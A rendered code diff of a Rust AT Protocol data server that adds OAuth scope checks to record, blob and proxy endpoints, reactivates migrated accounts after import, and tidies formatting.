info!(did = %user.did, "Cleared Discord ID");
439
} else {
440
+
if let Err(e) =
441
+
request_channel_verification(&state.db, user_id, "discord", discord_id, None).await
442
+
{
443
return (
444
StatusCode::INTERNAL_SERVER_ERROR,
445
Json(json!({"error": "InternalError", "message": e})),
···
475
.await;
476
info!(did = %user.did, "Cleared Telegram username");
477
} else {
478
+
if let Err(e) =
479
+
request_channel_verification(&state.db, user_id, "telegram", telegram_clean, None)
480
+
.await
481
+
{
482
return (
483
StatusCode::INTERNAL_SERVER_ERROR,
484
Json(json!({"error": "InternalError", "message": e})),
···
513
.await;
514
info!(did = %user.did, "Cleared Signal number");
515
} else {
516
+
if let Err(e) =
517
+
request_channel_verification(&state.db, user_id, "signal", signal, None).await
518
+
{
519
return (
520
StatusCode::INTERNAL_SERVER_ERROR,
521
Json(json!({"error": "InternalError", "message": e})),
···
530
Json(UpdateNotificationPrefsResponse {
531
success: true,
532
verification_required,
533
+
})
534
+
.into_response()
535
}
+10
-4
src/api/proxy.rs
+10
-4
src/api/proxy.rs
···
18
RawQuery(query): RawQuery,
19
body: Bytes,
20
) -> Response {
21
-
let proxy_header = match headers
22
-
.get("atproto-proxy")
23
-
.and_then(|h| h.to_str().ok())
24
-
{
25
Some(h) => h.to_string(),
26
None => {
27
return (
···
66
) {
67
match crate::auth::validate_bearer_token(&state.db, &token).await {
68
Ok(auth_user) => {
69
if let Some(key_bytes) = auth_user.key_bytes {
70
match crate::auth::create_service_token(
71
&auth_user.did,
···
18
RawQuery(query): RawQuery,
19
body: Bytes,
20
) -> Response {
21
+
let proxy_header = match headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) {
22
Some(h) => h.to_string(),
23
None => {
24
return (
···
63
) {
64
match crate::auth::validate_bearer_token(&state.db, &token).await {
65
Ok(auth_user) => {
66
+
if let Err(e) = crate::auth::scope_check::check_rpc_scope(
67
+
auth_user.is_oauth,
68
+
auth_user.scope.as_deref(),
69
+
&resolved.did,
70
+
&method,
71
+
) {
72
+
return e;
73
+
}
74
+
75
if let Some(key_bytes) = auth_user.key_bytes {
76
match crate::auth::create_service_token(
77
&auth_user.did,
+31
-20
src/api/repo/blob.rs
+31
-20
src/api/repo/blob.rs
···
62
} else {
63
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
64
Ok(user) => {
65
let deactivated = sqlx::query_scalar!(
66
"SELECT deactivated_at FROM users WHERE did = $1",
67
user.did
···
171
.blob_store
172
.put_bytes(&storage_key, bytes::Bytes::from(data))
173
.await
174
-
{
175
-
error!("Failed to upload blob to storage: {:?}", e);
176
-
return (
177
-
StatusCode::INTERNAL_SERVER_ERROR,
178
-
Json(json!({"error": "InternalError", "message": "Failed to store blob"})),
179
-
)
180
-
.into_response();
181
-
}
182
if let Err(e) = tx.commit().await {
183
error!("Failed to commit blob transaction: {:?}", e);
184
-
if was_inserted
185
-
&& let Err(cleanup_err) = state.blob_store.delete(&storage_key).await {
186
-
error!(
187
-
"Failed to cleanup orphaned blob {}: {:?}",
188
-
storage_key, cleanup_err
189
-
);
190
-
}
191
return (
192
StatusCode::INTERNAL_SERVER_ERROR,
193
Json(json!({"error": "InternalError"})),
···
231
if let Some(obj) = val.as_object() {
232
if let Some(type_val) = obj.get("$type")
233
&& type_val == "blob"
234
-
&& let Some(r) = obj.get("ref")
235
-
&& let Some(link) = r.get("$link")
236
-
&& let Some(s) = link.as_str() {
237
-
blobs.push(s.to_string());
238
-
}
239
for (_, v) in obj {
240
find_blobs(v, blobs);
241
}
···
62
} else {
63
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
64
Ok(user) => {
65
+
let mime_type_for_check = headers
66
+
.get("content-type")
67
+
.and_then(|h| h.to_str().ok())
68
+
.unwrap_or("application/octet-stream");
69
+
if let Err(e) = crate::auth::scope_check::check_blob_scope(
70
+
user.is_oauth,
71
+
user.scope.as_deref(),
72
+
mime_type_for_check,
73
+
) {
74
+
return e;
75
+
}
76
let deactivated = sqlx::query_scalar!(
77
"SELECT deactivated_at FROM users WHERE did = $1",
78
user.did
···
182
.blob_store
183
.put_bytes(&storage_key, bytes::Bytes::from(data))
184
.await
185
+
{
186
+
error!("Failed to upload blob to storage: {:?}", e);
187
+
return (
188
+
StatusCode::INTERNAL_SERVER_ERROR,
189
+
Json(json!({"error": "InternalError", "message": "Failed to store blob"})),
190
+
)
191
+
.into_response();
192
+
}
193
if let Err(e) = tx.commit().await {
194
error!("Failed to commit blob transaction: {:?}", e);
195
+
if was_inserted && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await {
196
+
error!(
197
+
"Failed to cleanup orphaned blob {}: {:?}",
198
+
storage_key, cleanup_err
199
+
);
200
+
}
201
return (
202
StatusCode::INTERNAL_SERVER_ERROR,
203
Json(json!({"error": "InternalError"})),
···
241
if let Some(obj) = val.as_object() {
242
if let Some(type_val) = obj.get("$type")
243
&& type_val == "blob"
244
+
&& let Some(r) = obj.get("ref")
245
+
&& let Some(link) = r.get("$link")
246
+
&& let Some(s) = link.as_str()
247
+
{
248
+
blobs.push(s.to_string());
249
+
}
250
for (_, v) in obj {
251
find_blobs(v, blobs);
252
}
+30
-5
src/api/repo/import.rs
+30
-5
src/api/repo/import.rs
···
53
Some(t) => t,
54
None => return ApiError::AuthenticationRequired.into_response(),
55
};
56
-
let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
57
-
Ok(user) => user,
58
-
Err(e) => return ApiError::from(e).into_response(),
59
-
};
60
let did = &auth_user.did;
61
let user = match sqlx::query!(
62
-
"SELECT id, deactivated_at, takedown_ref FROM users WHERE did = $1",
63
did
64
)
65
.fetch_optional(&state.db)
···
317
records.len(),
318
did
319
);
320
if let Err(e) = sequence_import_event(&state, did, &root.to_string()).await {
321
warn!("Failed to sequence import event: {:?}", e);
322
}
···
53
Some(t) => t,
54
None => return ApiError::AuthenticationRequired.into_response(),
55
};
56
+
let auth_user =
57
+
match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await {
58
+
Ok(user) => user,
59
+
Err(e) => return ApiError::from(e).into_response(),
60
+
};
61
let did = &auth_user.did;
62
let user = match sqlx::query!(
63
+
"SELECT id, handle, deactivated_at, takedown_ref FROM users WHERE did = $1",
64
did
65
)
66
.fetch_optional(&state.db)
···
318
records.len(),
319
did
320
);
321
+
if is_migration {
322
+
if let Err(e) =
323
+
sqlx::query!("UPDATE users SET deactivated_at = NULL WHERE did = $1", did)
324
+
.execute(&state.db)
325
+
.await
326
+
{
327
+
error!("Failed to reactivate account after import: {:?}", e);
328
+
}
329
+
let _ = state.cache.delete(&format!("handle:{}", user.handle)).await;
330
+
if let Err(e) = crate::api::repo::record::sequence_identity_event(
331
+
&state,
332
+
did,
333
+
Some(&user.handle),
334
+
)
335
+
.await
336
+
{
337
+
warn!("Failed to sequence identity event after import: {:?}", e);
338
+
}
339
+
if let Err(e) =
340
+
crate::api::repo::record::sequence_account_event(&state, did, true, None).await
341
+
{
342
+
warn!("Failed to sequence account event after import: {:?}", e);
343
+
}
344
+
}
345
if let Err(e) = sequence_import_event(&state, did, &root.to_string()).await {
346
warn!("Failed to sequence import event: {:?}", e);
347
}
+93
-15
src/api/repo/record/batch.rs
+93
-15
src/api/repo/record/batch.rs
···
101
.into_response();
102
}
103
};
104
-
let did = auth_user.did;
105
if input.repo != did {
106
return (
107
StatusCode::FORBIDDEN,
···
144
)
145
.into_response();
146
}
147
let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
148
.fetch_optional(&state.db)
149
.await
···
184
}
185
};
186
if let Some(swap_commit) = &input.swap_commit
187
-
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
188
-
return (
189
-
StatusCode::CONFLICT,
190
-
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
191
-
)
192
-
.into_response();
193
-
}
194
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
195
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
196
Ok(Some(b)) => b,
···
225
value,
226
} => {
227
if input.validate.unwrap_or(true)
228
-
&& let Err(err_response) = validate_record(value, collection) {
229
-
return *err_response;
230
-
}
231
let rkey = rkey
232
.clone()
233
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
···
276
value,
277
} => {
278
if input.validate.unwrap_or(true)
279
-
&& let Err(err_response) = validate_record(value, collection) {
280
-
return *err_response;
281
-
}
282
let mut record_bytes = Vec::new();
283
if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() {
284
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response();
···
353
};
354
let mut relevant_blocks = std::collections::BTreeMap::new();
355
for key in &modified_keys {
356
-
if mst.blocks_for_path(key, &mut relevant_blocks).await.is_err() {
357
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
358
}
359
if original_mst
···
101
.into_response();
102
}
103
};
104
+
let did = auth_user.did.clone();
105
+
let is_oauth = auth_user.is_oauth;
106
+
let scope = auth_user.scope;
107
if input.repo != did {
108
return (
109
StatusCode::FORBIDDEN,
···
146
)
147
.into_response();
148
}
149
+
150
+
if is_oauth {
151
+
use std::collections::HashSet;
152
+
let create_collections: HashSet<&str> = input
153
+
.writes
154
+
.iter()
155
+
.filter_map(|w| {
156
+
if let WriteOp::Create { collection, .. } = w {
157
+
Some(collection.as_str())
158
+
} else {
159
+
None
160
+
}
161
+
})
162
+
.collect();
163
+
let update_collections: HashSet<&str> = input
164
+
.writes
165
+
.iter()
166
+
.filter_map(|w| {
167
+
if let WriteOp::Update { collection, .. } = w {
168
+
Some(collection.as_str())
169
+
} else {
170
+
None
171
+
}
172
+
})
173
+
.collect();
174
+
let delete_collections: HashSet<&str> = input
175
+
.writes
176
+
.iter()
177
+
.filter_map(|w| {
178
+
if let WriteOp::Delete { collection, .. } = w {
179
+
Some(collection.as_str())
180
+
} else {
181
+
None
182
+
}
183
+
})
184
+
.collect();
185
+
186
+
for collection in create_collections {
187
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
188
+
is_oauth,
189
+
scope.as_deref(),
190
+
crate::oauth::RepoAction::Create,
191
+
collection,
192
+
) {
193
+
return e;
194
+
}
195
+
}
196
+
for collection in update_collections {
197
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
198
+
is_oauth,
199
+
scope.as_deref(),
200
+
crate::oauth::RepoAction::Update,
201
+
collection,
202
+
) {
203
+
return e;
204
+
}
205
+
}
206
+
for collection in delete_collections {
207
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
208
+
is_oauth,
209
+
scope.as_deref(),
210
+
crate::oauth::RepoAction::Delete,
211
+
collection,
212
+
) {
213
+
return e;
214
+
}
215
+
}
216
+
}
217
+
218
let user_id: uuid::Uuid = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
219
.fetch_optional(&state.db)
220
.await
···
255
}
256
};
257
if let Some(swap_commit) = &input.swap_commit
258
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid)
259
+
{
260
+
return (
261
+
StatusCode::CONFLICT,
262
+
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
263
+
)
264
+
.into_response();
265
+
}
266
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
267
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
268
Ok(Some(b)) => b,
···
297
value,
298
} => {
299
if input.validate.unwrap_or(true)
300
+
&& let Err(err_response) = validate_record(value, collection)
301
+
{
302
+
return *err_response;
303
+
}
304
let rkey = rkey
305
.clone()
306
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
···
349
value,
350
} => {
351
if input.validate.unwrap_or(true)
352
+
&& let Err(err_response) = validate_record(value, collection)
353
+
{
354
+
return *err_response;
355
+
}
356
let mut record_bytes = Vec::new();
357
if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() {
358
return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response();
···
427
};
428
let mut relevant_blocks = std::collections::BTreeMap::new();
429
for key in &modified_keys {
430
+
if mst
431
+
.blocks_for_path(key, &mut relevant_blocks)
432
+
.await
433
+
.is_err()
434
+
{
435
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
436
}
437
if original_mst
+33
-10
src/api/repo/record/delete.rs
+33
-10
src/api/repo/record/delete.rs
···
34
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
35
Json(input): Json<DeleteRecordInput>,
36
) -> Response {
37
-
let (did, user_id, current_root_cid) =
38
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
39
Ok(res) => res,
40
Err(err_res) => return err_res,
41
};
42
if let Some(swap_commit) = &input.swap_commit
43
-
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
44
-
return (
45
-
StatusCode::CONFLICT,
46
-
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
47
-
)
48
-
.into_response();
49
-
}
50
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
51
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
52
Ok(Some(b)) => b,
···
115
prev: prev_record_cid,
116
};
117
let mut relevant_blocks = std::collections::BTreeMap::new();
118
-
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
119
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
120
}
121
-
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
122
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
123
}
124
let mut written_cids = tracking_store.get_all_relevant_cids();
···
34
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
35
Json(input): Json<DeleteRecordInput>,
36
) -> Response {
37
+
let auth =
38
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
39
Ok(res) => res,
40
Err(err_res) => return err_res,
41
};
42
+
43
+
if let Err(e) = crate::auth::scope_check::check_repo_scope(
44
+
auth.is_oauth,
45
+
auth.scope.as_deref(),
46
+
crate::oauth::RepoAction::Delete,
47
+
&input.collection,
48
+
) {
49
+
return e;
50
+
}
51
+
52
+
let did = auth.did;
53
+
let user_id = auth.user_id;
54
+
let current_root_cid = auth.current_root_cid;
55
+
56
if let Some(swap_commit) = &input.swap_commit
57
+
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid)
58
+
{
59
+
return (
60
+
StatusCode::CONFLICT,
61
+
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
62
+
)
63
+
.into_response();
64
+
}
65
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
66
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
67
Ok(Some(b)) => b,
···
130
prev: prev_record_cid,
131
};
132
let mut relevant_blocks = std::collections::BTreeMap::new();
133
+
if new_mst
134
+
.blocks_for_path(&key, &mut relevant_blocks)
135
+
.await
136
+
.is_err()
137
+
{
138
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
139
}
140
+
if mst
141
+
.blocks_for_path(&key, &mut relevant_blocks)
142
+
.await
143
+
.is_err()
144
+
{
145
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
146
}
147
let mut written_cids = tracking_store.get_all_relevant_cids();
+19
-19
src/api/repo/record/read.rs
+19
-19
src/api/repo/record/read.rs
···
48
let user_id: uuid::Uuid = match user_id_opt {
49
Ok(Some(id)) => id,
50
Ok(None) => {
51
-
if let Some(proxy_header) = headers
52
-
.get("atproto-proxy")
53
-
.and_then(|h| h.to_str().ok())
54
-
{
55
let did = proxy_header.split('#').next().unwrap_or(proxy_header);
56
if let Some(resolved) = state.did_resolver.resolve_did(did).await {
57
let mut url = format!(
···
84
.header("content-type", "application/json")
85
.body(axum::body::Body::from(body))
86
.unwrap_or_else(|_| {
87
-
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
88
});
89
}
90
Err(e) => {
···
138
}
139
};
140
if let Some(expected_cid) = &input.cid
141
-
&& &record_cid_str != expected_cid {
142
-
return (
143
-
StatusCode::NOT_FOUND,
144
-
Json(json!({"error": "NotFound", "message": "Record CID mismatch"})),
145
-
)
146
-
.into_response();
147
-
}
148
let cid = match Cid::from_str(&record_cid_str) {
149
Ok(c) => c,
150
Err(_) => {
···
326
for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) {
327
if let Some(block) = block_opt
328
&& let Some((rkey, cid_str)) = cid_to_rkey.get(cid)
329
-
&& let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block) {
330
-
records.push(json!({
331
-
"uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey),
332
-
"cid": cid_str,
333
-
"value": value
334
-
}));
335
-
}
336
}
337
Json(ListRecordsOutput {
338
cursor: last_rkey,
···
48
let user_id: uuid::Uuid = match user_id_opt {
49
Ok(Some(id)) => id,
50
Ok(None) => {
51
+
if let Some(proxy_header) = headers.get("atproto-proxy").and_then(|h| h.to_str().ok()) {
52
let did = proxy_header.split('#').next().unwrap_or(proxy_header);
53
if let Some(resolved) = state.did_resolver.resolve_did(did).await {
54
let mut url = format!(
···
81
.header("content-type", "application/json")
82
.body(axum::body::Body::from(body))
83
.unwrap_or_else(|_| {
84
+
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error")
85
+
.into_response()
86
});
87
}
88
Err(e) => {
···
136
}
137
};
138
if let Some(expected_cid) = &input.cid
139
+
&& &record_cid_str != expected_cid
140
+
{
141
+
return (
142
+
StatusCode::NOT_FOUND,
143
+
Json(json!({"error": "NotFound", "message": "Record CID mismatch"})),
144
+
)
145
+
.into_response();
146
+
}
147
let cid = match Cid::from_str(&record_cid_str) {
148
Ok(c) => c,
149
Err(_) => {
···
325
for (cid, block_opt) in cids.iter().zip(blocks.into_iter()) {
326
if let Some(block) = block_opt
327
&& let Some((rkey, cid_str)) = cid_to_rkey.get(cid)
328
+
&& let Ok(value) = serde_ipld_dagcbor::from_slice::<serde_json::Value>(&block)
329
+
{
330
+
records.push(json!({
331
+
"uri": format!("at://{}/{}/{}", input.repo, input.collection, rkey),
332
+
"cid": cid_str,
333
+
"value": value
334
+
}));
335
+
}
336
}
337
Json(ListRecordsOutput {
338
cursor: last_rkey,
+84
-37
src/api/repo/record/utils.rs
+84
-37
src/api/repo/record/utils.rs
···
151
match lock_result {
152
Err(e) => {
153
if let Some(db_err) = e.as_database_error()
154
-
&& db_err.code().as_deref() == Some("55P03") {
155
-
return Err(
156
-
"ConcurrentModification: Another request is modifying this repo"
157
-
.to_string(),
158
-
);
159
-
}
160
return Err(format!("Failed to acquire repo lock: {}", e));
161
}
162
Ok(Some(row)) => {
163
if let Some(expected_root) = ¤t_root_cid
164
-
&& row.repo_root_cid != expected_root.to_string() {
165
-
return Err(
166
-
"ConcurrentModification: Repo has been modified since last read"
167
-
.to_string(),
168
-
);
169
-
}
170
}
171
Ok(None) => {
172
return Err("Repo not found".to_string());
173
}
174
}
175
sqlx::query!(
176
"UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2",
177
new_root_cid.to_string(),
···
289
}
290
})
291
.collect::<Vec<_>>();
292
-
let event_type = "commit";
293
-
let prev_cid_str = current_root_cid.map(|c| c.to_string());
294
-
let prev_data_cid_str = prev_data_cid.map(|c| c.to_string());
295
-
let seq_row = sqlx::query!(
296
-
r#"
297
-
INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)
298
-
VALUES ($1, $2, $3, $4, $5, $6, $7, $8)
299
-
RETURNING seq
300
-
"#,
301
-
did,
302
-
event_type,
303
-
new_root_cid.to_string(),
304
-
prev_cid_str,
305
-
json!(ops_json),
306
-
&[] as &[String],
307
-
blocks_cids,
308
-
prev_data_cid_str,
309
-
)
310
-
.fetch_one(&mut *tx)
311
-
.await
312
-
.map_err(|e| format!("DB Error (repo_seq): {}", e))?;
313
-
sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq))
314
-
.execute(&mut *tx)
315
.await
316
-
.map_err(|e| format!("DB Error (notify): {}", e))?;
317
tx.commit()
318
.await
319
.map_err(|e| format!("Failed to commit transaction: {}", e))?;
320
-
let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await;
321
Ok(CommitResult {
322
commit_cid: new_root_cid,
323
rev: rev_str,
···
482
.map_err(|e| format!("DB Error (notify): {}", e))?;
483
Ok(seq_row.seq)
484
}
···
151
match lock_result {
152
Err(e) => {
153
if let Some(db_err) = e.as_database_error()
154
+
&& db_err.code().as_deref() == Some("55P03")
155
+
{
156
+
return Err(
157
+
"ConcurrentModification: Another request is modifying this repo".to_string(),
158
+
);
159
+
}
160
return Err(format!("Failed to acquire repo lock: {}", e));
161
}
162
Ok(Some(row)) => {
163
if let Some(expected_root) = ¤t_root_cid
164
+
&& row.repo_root_cid != expected_root.to_string()
165
+
{
166
+
return Err(
167
+
"ConcurrentModification: Repo has been modified since last read".to_string(),
168
+
);
169
+
}
170
}
171
Ok(None) => {
172
return Err("Repo not found".to_string());
173
}
174
}
175
+
let is_account_active = sqlx::query_scalar!(
176
+
"SELECT deactivated_at IS NULL FROM users WHERE id = $1",
177
+
user_id
178
+
)
179
+
.fetch_optional(&mut *tx)
180
+
.await
181
+
.map_err(|e| format!("Failed to check account status: {}", e))?
182
+
.flatten()
183
+
.unwrap_or(false);
184
sqlx::query!(
185
"UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2",
186
new_root_cid.to_string(),
···
298
}
299
})
300
.collect::<Vec<_>>();
301
+
if is_account_active {
302
+
let event_type = "commit";
303
+
let prev_cid_str = current_root_cid.map(|c| c.to_string());
304
+
let prev_data_cid_str = prev_data_cid.map(|c| c.to_string());
305
+
let seq_row = sqlx::query!(
306
+
r#"
307
+
INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids, prev_data_cid)
308
+
VALUES ($1, $2, $3, $4, $5, $6, $7, $8)
309
+
RETURNING seq
310
+
"#,
311
+
did,
312
+
event_type,
313
+
new_root_cid.to_string(),
314
+
prev_cid_str,
315
+
json!(ops_json),
316
+
&[] as &[String],
317
+
blocks_cids,
318
+
prev_data_cid_str,
319
+
)
320
+
.fetch_one(&mut *tx)
321
.await
322
+
.map_err(|e| format!("DB Error (repo_seq): {}", e))?;
323
+
sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq))
324
+
.execute(&mut *tx)
325
+
.await
326
+
.map_err(|e| format!("DB Error (notify): {}", e))?;
327
+
}
328
tx.commit()
329
.await
330
.map_err(|e| format!("Failed to commit transaction: {}", e))?;
331
+
if is_account_active {
332
+
let _ = sequence_sync_event(state, did, &new_root_cid.to_string()).await;
333
+
}
334
Ok(CommitResult {
335
commit_cid: new_root_cid,
336
rev: rev_str,
···
495
.map_err(|e| format!("DB Error (notify): {}", e))?;
496
Ok(seq_row.seq)
497
}
498
+
499
+
pub async fn sequence_empty_commit_event(state: &AppState, did: &str) -> Result<i64, String> {
500
+
let repo_root = sqlx::query_scalar!(
501
+
"SELECT r.repo_root_cid FROM repos r JOIN users u ON r.user_id = u.id WHERE u.did = $1",
502
+
did
503
+
)
504
+
.fetch_optional(&state.db)
505
+
.await
506
+
.map_err(|e| format!("DB Error fetching repo root: {}", e))?
507
+
.ok_or_else(|| "Repo not found".to_string())?;
508
+
let ops = serde_json::json!([]);
509
+
let blobs: Vec<String> = vec![];
510
+
let blocks_cids: Vec<String> = vec![];
511
+
let seq_row = sqlx::query!(
512
+
r#"
513
+
INSERT INTO repo_seq (did, event_type, commit_cid, prev_cid, ops, blobs, blocks_cids)
514
+
VALUES ($1, 'commit', $2, $2, $3, $4, $5)
515
+
RETURNING seq
516
+
"#,
517
+
did,
518
+
repo_root,
519
+
ops,
520
+
&blobs,
521
+
&blocks_cids
522
+
)
523
+
.fetch_one(&state.db)
524
+
.await
525
+
.map_err(|e| format!("DB Error (repo_seq empty commit): {}", e))?;
526
+
sqlx::query(&format!("NOTIFY repo_updates, '{}'", seq_row.seq))
527
+
.execute(&state.db)
528
+
.await
529
+
.map_err(|e| format!("DB Error (notify): {}", e))?;
530
+
Ok(seq_row.seq)
531
+
}
+100
-35
src/api/repo/record/write.rs
+100
-35
src/api/repo/record/write.rs
···
22
use tracing::error;
23
use uuid::Uuid;
24
25
-
pub async fn has_verified_comms_channel(
26
-
db: &PgPool,
27
-
did: &str,
28
-
) -> Result<bool, sqlx::Error> {
29
let row = sqlx::query(
30
r#"
31
SELECT
···
52
}
53
}
54
55
pub async fn prepare_repo_write(
56
state: &AppState,
57
headers: &HeaderMap,
58
repo_did: &str,
59
http_method: &str,
60
http_uri: &str,
61
-
) -> Result<(String, Uuid, Cid), Response> {
62
let extracted = crate::auth::extract_auth_token_from_header(
63
headers.get("Authorization").and_then(|h| h.to_str().ok()),
64
)
···
69
)
70
.into_response()
71
})?;
72
-
let dpop_proof = headers
73
-
.get("DPoP")
74
-
.and_then(|h| h.to_str().ok());
75
let auth_user = crate::auth::validate_token_with_dpop(
76
&state.db,
77
&extracted.token,
···
163
)
164
.into_response()
165
})?;
166
-
Ok((auth_user.did, user_id, current_root_cid))
167
}
168
#[derive(Deserialize)]
169
#[allow(dead_code)]
···
188
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
189
Json(input): Json<CreateRecordInput>,
190
) -> Response {
191
-
let (did, user_id, current_root_cid) =
192
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
193
Ok(res) => res,
194
Err(err_res) => return err_res,
195
};
196
if let Some(swap_commit) = &input.swap_commit
197
-
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
198
-
return (
199
-
StatusCode::CONFLICT,
200
-
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
201
-
)
202
-
.into_response();
203
-
}
204
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
205
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
206
Ok(Some(b)) => b,
···
234
}
235
};
236
if input.validate.unwrap_or(true)
237
-
&& let Err(err_response) = validate_record(&input.record, &input.collection) {
238
-
return *err_response;
239
-
}
240
let rkey = input
241
.rkey
242
.unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string());
···
285
cid: record_cid,
286
};
287
let mut relevant_blocks = std::collections::BTreeMap::new();
288
-
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
289
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
290
}
291
-
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
292
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
293
}
294
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
···
356
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
357
Json(input): Json<PutRecordInput>,
358
) -> Response {
359
-
let (did, user_id, current_root_cid) =
360
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
361
Ok(res) => res,
362
Err(err_res) => return err_res,
363
};
364
if let Some(swap_commit) = &input.swap_commit
365
-
&& Cid::from_str(swap_commit).ok() != Some(current_root_cid) {
366
-
return (
367
-
StatusCode::CONFLICT,
368
-
Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})),
369
-
)
370
-
.into_response();
371
-
}
372
let tracking_store = TrackingBlockStore::new(state.block_store.clone());
373
let commit_bytes = match tracking_store.get(¤t_root_cid).await {
374
Ok(Some(b)) => b,
···
403
};
404
let key = format!("{}/{}", collection_nsid, input.rkey);
405
if input.validate.unwrap_or(true)
406
-
&& let Err(err_response) = validate_record(&input.record, &input.collection) {
407
-
return *err_response;
408
-
}
409
if let Some(swap_record_str) = &input.swap_record {
410
let expected_cid = Cid::from_str(swap_record_str).ok();
411
let actual_cid = mst.get(&key).await.ok().flatten();
···
480
}
481
};
482
let mut relevant_blocks = std::collections::BTreeMap::new();
483
-
if new_mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
484
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response();
485
}
486
-
if mst.blocks_for_path(&key, &mut relevant_blocks).await.is_err() {
487
return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response();
488
}
489
relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
···
22
use tracing::error;
23
use uuid::Uuid;
24
25
+
pub async fn has_verified_comms_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
26
let row = sqlx::query(
27
r#"
28
SELECT
···
49
}
50
}
51
52
+
pub struct RepoWriteAuth {
53
+
pub did: String,
54
+
pub user_id: Uuid,
55
+
pub current_root_cid: Cid,
56
+
pub is_oauth: bool,
57
+
pub scope: Option<String>,
58
+
}
59
+
60
pub async fn prepare_repo_write(
61
state: &AppState,
62
headers: &HeaderMap,
63
repo_did: &str,
64
http_method: &str,
65
http_uri: &str,
66
+
) -> Result<RepoWriteAuth, Response> {
67
let extracted = crate::auth::extract_auth_token_from_header(
68
headers.get("Authorization").and_then(|h| h.to_str().ok()),
69
)
···
74
)
75
.into_response()
